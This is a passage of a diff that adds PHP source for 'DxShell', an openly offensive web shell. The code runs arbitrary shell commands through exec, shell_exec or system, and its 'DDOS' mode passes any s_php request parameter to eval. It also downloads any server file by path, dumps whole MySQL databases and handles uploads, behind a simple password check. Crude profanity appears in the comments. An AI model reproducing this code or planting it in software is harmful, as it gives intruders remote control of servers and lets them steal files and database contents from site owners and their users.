+	print '<script>location="'.$URL.'";</script>';
+	/* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */
+	}
+	else
+	header('Location: '.$URL);
+return 1;
+}
+
+if (!function_exists('mime_content_type'))
+	{
+	if ($GLOB['SYS']['OS']['id']!='Win')
+		{	function mime_content_type($f)
+			{
+			$f = @escapeshellarg($f);
+			return @trim(`file -bi `.$f);
+			}
+			}
+		else
+		{
+			function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */
+		}
+	}
+
+
+function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */
+{
+$MySQL_Return_Array=array();
+
+if ($MySQL_res===false) return 0;
+if ($MySQL_res===true)	return 0;
+
+$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0;
+
+if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {}
+	else	 while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {}
+array_pop($MySQL_Return_Array);
+
+for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */
+	{
+	if ($i==0)
+		{
+		$INDEXES=array_keys($MySQL_Return_Array[$i]);
+		$count=count($INDEXES);
+		}
+	for ($j=0; $j<$count; $j++)
+		{
+		$key=&$INDEXES[$j];
+		$val=&$MySQL_Return_Array[$i][$key];
+		if (is_string($val)) $val=stripcslashes($val);
+		}
+	}
+return $ret;
+}
+
+function DxMySQLQ($query, $die_on_err)
+{
+$q=mysql_query($query);
+if (mysql_errno()!=0)
+	{
+	DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error());
+	if ($die_on_err) die();
+	}
+return $q;
+}
+
+function DxDecorVar(&$var, $htmlstr)
+{
+if (is_null($var)) return 'NULL';
+if (!isset($var)) return '[!isset]';
+
+if (is_bool($var))		return ($var)?'true':'false';
+if (is_int($var))   	return (int)$var;
+if (is_float($var)) 	return number_format($var, 4, '.', '');
+if (is_string($var))
+	{
+	if (empty($var)) return '&nbsp;';
+	if (!$htmlstr)	return ''.($var).'';
+			   else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).'';
+	}
+if (is_array($var))		return '(ARR)'.var_export($var, true).'(/ARR)';
+if (is_object($var))	return '(OBJ)'.var_export($var, true).'(/OBJ)';
+if (is_resource($var))	return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)';
+return '(???)'.var_export($var, true).'(/???)';
+}
+
+function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array())
+{
+if (!empty($posts))
+	{
+	$postValues='';
+	foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';}
+	$postValues = substr( $postValues, 0, -1 );
+	$method = 'POST';
+	} else $postValues = '';
+
+ if (!empty($cookie))
+	{
+	$cookieValues='';
+	foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';}
+	$cookieValues = substr( $cookieValues, 0, -1 );
+	} else $cookieValues = '';
+
+$request  = $method.' '.$URL.' HTTP/1.1'."\r\n";
+if (!empty($host))			$request .= 'Host: '.$host."\r\n";
+if (!empty($cookieValues))	$request .='Cookie: '.$cookieValues."\r\n";
+if (!empty($user_agent))	$request .= 'User-Agent: '.$user_agent.' '."\r\n";
+$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */
+if (!empty($referer))		$request .= 'Referer: '.$referer."\r\n";
+if ( $method == 'POST' )
+	{
+	$lenght = strlen( $postValues );
+	$request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n";
+	$request .= 'Content-Length: '.$lenght."\r\n";
+	$request .= "\r\n";
+	$request .= $postValues;
+	}
+$request.="\r\n\r\n";
+return $request;
+}
+
+function DxFiles_UploadHere($path, $filename, &$contents)
+{
if (empty($contents)) die(DxError('Received empty'));
+$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename;
+if (!($f=fopen($path.$filename, 'w')))
+	{
+	$path='/tmp/';
+	if (!($f=fopen($path.$filename, 'w')))
+		die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =('));
+		else
+		DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)');
+	}
+fputs($f, $contents);
+fclose($f);
+print "\n".'Saved file to "'.$path.$filename.'" - OK';
+print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';;
+}
+
+function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */
+{
+$OUT=array(); $RET='';
+if (function_exists('exec'))
+	{
	if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */
+	return array(true,true,'exec', '');
+	}
+	elseif  (function_exists('shell_exec'))
+	{
	if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */
+	return array(true,false,'shell_exec', '<s>exec</s> shell_exec');
+	}
+	elseif  (function_exists('system'))
+	{
	if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */
+	return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =(');
+	}
+	else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');;
+}
+
+###################################################################################
+#####################++++++++++++# L O G I N #++++++++++++++++#####################
+###################################################################################
+if (   isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false   )
+	{ /* IMGS are allowed without passwd =) */
	$GLOB['SHELL']['USER']['Login']='';
+	$GLOB['SHELL']['USER']['Passw']='';
+	}
+
+if (	isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false   )
+	{
+	if ($DXGLOBALSHIT)
+		{
		if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1);
+		}
+		else
+		{
+		header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"');
		header('HTTP/1.0 401 Unauthorized');
+		}
+
+	print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>';
+	DxGotoURL(DxURL('kill',''), '1noheaders');
+	die();
+	}
+
+if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2))
+	{
	if ($DXGLOBALSHIT)
+		{
		if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC']))
+			{
			if (!(
+
+				((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */
+				(@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw']
+							OR
+				(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw']))
+				))
+						OR
+				@$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */
+
+				))
+				{print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);}
+				else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2);
+				}
+		if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC']))
+			{
+			print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">';
+			print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>';
+			print "\n".'</form>';
+			die();
+			}
+		}
+		else
+		{
+		if (!isset($_SERVER['PHP_AUTH_USER']))
+			{
+			header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+			else
+			if (!(	$_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login']
+			AND (
+					$_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw']
+								OR
+					(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw'])
+					)
+					))
+			{
+			header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+		}
+	}
+
+###################################################################################
+####################++++++# I N S T A N T    U S A G E #+++++++####################
+###################################################################################
+if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']);
+if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php']  */
+	{
+	$F = $_GET + $_POST;
+	if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!');
+	eval(stripslashes($F['s_php']));
+	die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':''));
+	}
+if ($_GET['dxmode']=='IMG')
+	{
+	$IMGS=array(
+		'DxS'	=> 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=',
+		'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=',
+		'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=',
+		'view'	=> 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==',
+		'del'	=> 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7',
+		'copy'	=> 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==',
+		'move'	=> 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7',
+		'exec'	=> 'R0lGODlhoQFLAKIAADc2NX98exkYGFxZWaOengEBAQAAAAAAACwAAAAAoQFLAAAD/1i63P4wykmrvTjrzbv/YCiOpCcMAqCuqhCAgCDPM1AEKQsM8SsXAuAviNOtXJQYrXYCmh5BRWA3qFp5rwlqSRtMTrnWMSuZGlvkjpIrs0mipbh8nnFD4B08VGKP6Bt/DoELgyR9Dod7fklvjIsfhU50k5SVFjY/C26RFoVBmGxNi6BKCp8UUXpBmXReNTsxBV5fkoSrjDNOKQWJiEJsvRmRnJbFxoYMq7HBGJ68Qrozs3xAKr60fswiXipWpdOLf7cTfVHLuIKiT4/H7e7IydbPkKO60CngEDY7q7faphJQUJpiJcCWIPkU3XFkSobAf89S/doBYti7ixjVNOCnAP8iqnpLgFTRdqrKA4ieEpYQQGCAwSo0ZH1kFyGRPIigNvKo2Cijz5/k4tnxiK3mvY48cMKy1ZGhIJUkWLqEGRNqsp7UAII5FTTXqpE8aQIdO9YOPn9h94BSBhOiFVXzsAKiSIlAAINrnFglJFdfPIFxjUrEt5OeWLKIMcI5AY5oI1Z8Mf2yEhjCS75OUOorPKmlQS4yiyYbR83cTq6lo410fPgqscSw5wzlAYf1nRx+GVDZpwVvzB+aH9Be6aDlwaozCS0ltnhpU9FIk6Y9KS+29WKuGK9R1+FKv1xbYgC4+zkNHsKABaGjAUvyQgyJPucu3abKlF2LstsHT+HFkfH/d41Xywab9EMFDtcleAwVUVHBWTYMflFFS+KxIEMa7+n0WjOJGHeFNxi+4WB6RTl31QXdkCgCerFsqOCLDtC2hHg3jEfAjR8WcQY/5PV41412AeljgD0CeeOQQwppWwM4vGTfjeOFYUQKVIbiwgqrodGfS0i+8KORR95l5S5TfPmSQTqe4aWPRoppRjdw+sfFCjeQB6ZdIcKoZ3J+udTSRgPGKAiAaIqpyAkv/bNDABQOaI5T0UXUGiCawNXPaKFFUJCPNuTZgCv29eGeZbVxiYIPkwJEEJd3bZGFi3u+eKk9RBC6nUzf/UIEL1gy+iOrOpCZAqc7dsPoAC3B6oCc/20EiOs9aJEWmRAHZdaflOKdAECQRwLpBap7vGAqcmvl0qksO4B5Q0SgubdYDkH+iNe5sdbbVbjjUcWftKryumiRwG5nw6mctvHfsK3+meoCPkgD07Pq8TvtWb9URmnDMxqE55DfBsqkC1Mhd4tE56rA5rrfxTSqJlN5Rh4L69or8x6FkKfvD64AdJV/hNrs8n3sycJqq//pwCqysWQYAbOLCpQzpfaoJRJgwHnMALP1IYtslx1HUijQOEej8rr2+cjSPENULU7LPSZljacz1+sJSy+H9DRmuw5tM5oubUem3m4HOzSyFk2A8VSx3D2aRZjcjFq4vNRn59ZIdr2Qy//HIaTrb2TL+yueq40tDhUbz/t23Kg/B8W25IGWMyu3/Nw2LDbPWIDsb7ZgsI+E9/VAwwAOp7hyw09roib9CfGvn5QDjvLl44psS9Ytdetr9a1+uNPKulH+Mp1wpw5jIem26nrUzeE+Ehi1s8f67GKIATgBkEG9kJxTbQHxaC7VP+36l+IeX/xzNJ+tgHfPW51nZLSvHOSIdXiKV/XyF7qmwIVXpTNdzMQns0JMKEDnS0XaNMa7NRDsM+zxXoAqxEKOEcBqOitDNfgWtkA0bRCfYEy7+tOzvbkgBwgE11MWeD4s5UhrEYyg1nwzMkntIYNv2iAH5XYHHhiHDfszRdP/Nha4GHzLfCnMYLH0pjEYmnEBoPKGXqx2haSdRIfXuI36UNApILYtgYhYYuY0lzL0VO9O1bMGFgWoKsCdbor28ps0SJg7FmANPSTUX8UGxiUleNFUYNmIF4ckIN8t6wRKOmDkuGAfALKhbGLYRXYGtUSi1eAGdnwZyoDxQdM5Eoa10l4LioeZ+7kAflJEJOoYo0ZNqkJ7uPOhd3KhMTANCV2MApOAxsQcXhRTOYcg5jUBkcn5aLGWDGwDLBdlpI5txjuAcOCOvATIHt2AB1ky2SjntK5oesucwtxTl+5UpDb9EpA3CgQ+3kc0LHFxCsuyZo6C+TuDWehbzrRTkJCJ/6OIsslbSLpd4PyEPZuxEFeMMV+n9mnRL92oAj1kDSd8MKJYhC+fsAkRgOKVosFVo2xg9BdOEwasGmxtY0egkrgy+lIz5tJ8UyNAddDItrfEqJtXG0828zXHt8VyhXnSpnFqmjBc/nOiY+DTxXgVRJjqE13GiqZafcXW/nFsl9o8YulMqMfCSGRNZaUFZHLxR7ZWVHc10Jj37LJRj+pAozj4jbag2KoyObBHLDRaNH9q0mO90HAfulRRnSGnnuHTrArimcnaxlgi/RJ+25qKk0jbthkI9iVecQJePcpQXwhUo9z6kkvm2Sykyc5tiFphDuC1283JtoekHcnQiiaGyf+V1jP+u5pq10AvT/arueSpLWhjqtMk7VNAO8WLTBQpzj0OS4+gIcJpC6pd3fhBKmGKFxIyN90yoRayRtNaQm5RhPBOEEln+Q+rOpqk4kIPjMwU6854hTA3bfdFonXhPpGwydZyIxQDAwYjR1Y1+9atuka5Q2olSNh1+a1sPwRcg80gOf02JLbA+1fCunSwAzp3nwZ+IuJCstlF8ExvnXzwdX6MJC4OjcKSs9mFgSGLNnQhkmLjr2dpVFRCpgtZYRLvI/NlEgJy6mgsMFWjOLcr6toqmW+S0vyUbKcgR4CIQevx/YTmQiEniGf7NF2PkBwGn40pw1W6kGALBI1OgRn/N1XWFBLlBU8TdwFx40Rua2086M3xl7e9RTNz9dbRpNgJCXzwjCLb20v1eJhTl7VzbLzMphVSukmY3mI47TZK8SRMkLkKAuaoS2rVAUKw8Vqho127mnGuuISU1ppkBjPLOdENScytHIV6xShQ1wS2oJHziWSQzJ0UVdUXGer1QNfFyVL4DBPqG5PpGObGpm1su4ZZolUhVW4ZiUeBDp6wegVFHRiQvM9IU9FgScZspbVIUoUTlun30tQCXNtzGbFhQQxushDwQ27s3kPMiE6FsEw6ONTogxj2kWOmW3tREGKEfD21D2l8Qsx43MUe+71Xae80T/3soJQa4sfw7+QZ/wfCtyveDnuW9KJA7dLLhMS3u9QJ6W41GpyYzrtEY2aL9s7ybKm+XomW9E7aQnfXM0rtedWpnV/rJ57egDSuQTw6tVS6soheiZSW2hQP60TIkqBuVED1RFlJhhWS1fLhPBUVDkIoGpUMAjxDFmWDi64CpvLikFxoSXw5SFrtQ/dYFWrW5ZpaDGvisFKEou8Sw/vI66AzFi0heqvkCEDIiyhl29pnCraH44lWz/a9ksOwkDxSwuL6M3Y+MYnyuCY2wafjxcgsWgg64EOcirdIK0J4WKqEkEYI7zBf+b+zJqdgCVv1PIUYq2/GM3bTIosd3zryCRT35FFNwX+/+4thO/90TvKX9nNTIHigIlGjE/TjUw+zFxYgbrSFJqUwMTHCCVQCA8HXRJj3fu4AgOAXOaOnNOYgfRkXCdJnP9QnEv+AG7VxW3KUQt/QeLLASRplFpcyCDghfJ2AIPnHchYYG/c3fUxhfFYTE5hyd+m0f7ZVDTTYELSCgpDzCvzxAbPlSgUoGHEUDnlAI8yGgzmYGCvTRNbFg9BROF2IPBLRCT7oDNnhFZrjhM/2eOAyBMiTgXAIHzBUgVlYDInQRM5AhBcwdxqQExsYhn84Me+WhoB4arwnROaXBzDAFJlAh3VYd3hDKwujFVADgZAohFSoh2sUg2HjhCqkZQNIiXwYiKz/dx5v+Iiw4Yf2QEik6BobmHqtOAKmlwuPwIVKQylnSGsf8Ee5dS59pDaK+AECJHOoOBYgqImYuIeVMIqxWHKBlyop4CEdh4giuAHMmIzNWIzvIHAPRU1uQU3giEUVAwWweDXDVSzM1Q2WNiNW0ikj0kZDx0rbgnZO10Vhto7hKE7WKFvYElba+I8AuRHtWCObIiQLhHEBmZAKKT6csA/viAX5A1j6uJAUWZEJMjd8o0uSFIcW2ZEe6Q6jQzrtERKs6IMfeZIoGQfNESzlIjqTmJIwGZPrQIuzJwkkaVQymZM6OR2U0pLmYkaOuJNCCZPO4JPAeItDmZRK6YWCuEO3/xWUSxmVCpl6pxAKkjIObiiVWjmUljiJ17iVYImKtCcNDzkSRRBoPhWWarmWbCkHX9mWcBmI9SMlQCgMS4UbL7kiQdWV1bAkTjYoRxCXMckd3Sd4bcOAfRh/tSeDAtiHIdgRHMMH0/BLsFJ7QYdcb2mEggluJnF+hIAXoJkviWkQk9cqgFgBiPKY+RIFnUkTV7KHlAcFICRVIdB3m/lgPwSZiudmruKQ2QMYZdOYddM6pdmZolma2YMUvBdcm0Kcy9KGpikSZkCaDJB+0ikfPdMLTid0XtA/pblipwEsvGA2twladNE3tGltkoAgUoAXJgEgN/ScjWUoj9U47FlQ0/9JEOXhnljgGxAgnuOZBfCJKAHYC9oBIAhjeEyyWvuwm/cBQv2DOCHjSuUJWp1pnAzzB+xZJ6vQJO7pLEzSn/vRfdSZmxw6eaX0LyrKmggIoC0ImZugeJPXC1HCMAOzofJJnK8pBT0wC1dCNFyCKBX6YJ0poxn6SQwzDR52Bb/TnYmFUPmSXVLAoiyjZGCxPOPZGzT5mjlmpOnHm9wQPtljKDWCRrWSpFbqKkO6XUU6C4WBo9xpCop3JX3zBtsJo/kyWjCKonpRSpUoJm4mCNTJYC1Yp3JqFoOqGyWKUN4pm7Owmu90qDtKkEYqdJm5pqkooGfSob9mKMcpVb/EpJ2Jagf5M59msGNkSpoUBJF6CjJOpair5aPReZ3iUUnH1Fh0VDeIQKaiyWUvs6ijxaSumneYypDsSTFCw00tIHrj6QYW8hTpEXxl6Q2Qmqz+sgwdx355hJBIAQdthB6rRxjOWkE6kR74gXHHqS0doTuqp33Fijqt+THvOq8WCafWRK/4upBKmK9ykAAAOw==',
+		'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7',
+		'ed'	=> 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7',
+		'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7',
+		'gzip'	=> 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=',
+		);
+	@ob_clean();
+	if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone';
+	header('Cache-Control: public');
+	Header('Last-Modified: '.gmdate('D, d M Y H:i:s', time()-60*60*24*365).' GMT');   //Date('r'
+	header('Expires: '.gmdate('D, d M Y H:i:s', time()+60*60*24*365).' GMT');
+	header('Content-type: image/gif');
+	print  base64_decode(   (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']]   );
+	die();
+	}
+
+if ($_GET['dxmode']=='F_DWN')
+	{
+	if (!isset($_GET['dxfile'])) 		die(DxError('No file selected. Check $_GET[\'dxfile\'] var'));
+	if (!file_exists($_GET['dxfile']))  die(DxError('No such file'));
+	if (!is_file($_GET['dxfile'])) 		die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']=basename($_GET['dxfile']);
+	if (isset($_GET['dxparam']))
+		$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */
+		else
+		{
		$DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile']));
+		$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";');
+		}
+	$DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']);
+	}
+
+if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam']))
+	{/* download query results */
	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	/* export as csv */
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$_POST['dxsql_q']=explode(';',$_POST['dxsql_q']);
+
+	for ($q=0;$q<count($_POST['dxsql_q']);$q++)
+		{
		if (empty($_POST['dxsql_q'][$q])) continue;
+		$num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false);
+		$DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";";
+		if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;}
+		foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */
+		for ($l=0;$l<count($DUMP);$l++)
+			{
			$DxDOWNLOAD_File['content'].="\n";
+			$INDEXES=array_keys($DUMP[$l]);
+			for ($i=0; $i<count($INDEXES); $i++)
+				$DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";";
+
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables']))
+	{
	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	if (empty($_POST['dxsql_tables']))  die(DxError('No tables selected...'));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66);
+	$DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync';
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']);
+	$DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */';
+
+	if (!empty($_POST['dxsql_q']))
+		{
		$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+		foreach ($_POST['dxsql_q'] as $CUR)
+			if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */
+		}
+
+	foreach ($_POST['dxsql_tables'] as $CUR_TABLE)
+		{
		$DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		$DxDOWNLOAD_File['content'].="\n".$DUMP[0][1];
+		$DxDOWNLOAD_File['content'].="\n\n";
+		DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		for ($i=0; $i<count($DUMP); $i++)
+			{
+			for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]);
+			$DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");';
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam']))
+	{
	foreach ($_POST['dxparam'] as $name => $val)
+		{
		if ($name=='DXS_NEWCOOK')
+			{
+			if (empty($val['NAM']) or empty($val['VAL'])) continue;
